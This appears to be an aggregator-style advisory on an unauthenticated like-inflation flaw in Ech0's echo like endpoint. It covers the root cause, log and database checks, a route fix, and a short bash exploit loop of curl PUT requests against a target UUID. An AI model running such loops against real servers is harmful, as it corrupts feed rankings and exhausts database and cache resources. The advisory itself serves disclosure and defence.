Listen to this Post
How the mentioned CVE works:
The vulnerability resides in the `PUT /api/echo/like/:id` endpoint registered on `PublicRouterGroup` (no JWT middleware). An anonymous attacker can increment the `fav_count` of any echo, including private ones, by sending repeated PUT requests with a valid UUID. The handler `EchoService.LikeEcho` calls `EchoRepository.LikeEcho` which executes `UpdateColumn(“fav_count”, gorm.Expr(“fav_count + ?”, 1))` without any ownership, private-flag, or viewer check. Unlike the read path that blocks private echoes from anonymous users, the like path allows them. Each successful like triggers `InvalidateEchoCaches` wiping four cache keys (page, today, RSS, per-echo), causing a cache stampede. No rate limiting exists, unlike comment endpoints which have 3 per 60s and 20 per 3600s. An attacker can harvest echo UUIDs from the public `/api/echo/page` endpoint, then inflate likes arbitrarily. Private echo UUIDs can be obtained via logs, referer headers, or shared drafts. A single IP can drive unlimited database writes and cache invalidations, degrading performance and manipulating the “hot” feed ranking.
dailycve form:
Platform: Ech0
Version: v4.5.6
Vulnerability: Unauthenticated like inflation
Severity: Critical
date: 2026-05-08
Prediction: Patch expected 2026-05-22
What Undercode Say:
Analytics under this heading show exploitation patterns via bash commands.
Count anonymous like attempts from logs
grep "PUT /api/echo/like/" /var/log/ech0/access.log | wc -l
Monitor fav_count spikes on private echoes
sqlite3 ech0.db "SELECT id, fav_count FROM echoes WHERE private=1 ORDER BY fav_count DESC LIMIT 10;"
Simulate cache invalidation bursts
for i in {1..100}; do curl -X PUT http://localhost:8300/api/echo/like/$(uuidgen); done
Exploit:
Attacker sends unauthenticated PUT requests to any known echo UUID. No token, no rate limit, no deduplication. Private echoes accept likes despite being unreadable. Mass requests cause DB write amplification and cache stampedes.
Exploit script TARGET="http://localhost:8300" UUID="019daf77-4a97-7c4c-a63c-791b10ecfd0b" while true; do curl -X PUT "$TARGET/api/echo/like/$UUID"; done
Protection from this CVE
Move endpoint to `AuthRouterGroup` with JWT middleware. Add per-user rate limit (e.g., 5 per 10s) and a `likes` join table to enforce one like per user per echo. Check `echo.Private` flag and require admin rights to like private echoes. Apply middleware at router layer.
// Fixed route registration
appRouterGroup.AuthRouterGroup.PUT("/echo/like/:id",
middleware.RateLimit(5, 10),
h.EchoHandler.LikeEcho())
Impact:
- Arbitrary inflation of `fav_count` corrupts hot feed ranking.
- Private echoes accept likes from any UUID-knowing attacker, breaking privacy boundary.
- Continuous DB updates + 4-key cache invalidation per like cause denial-of-service via resource exhaustion.
- No authentication enables global exploitation from single IP.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
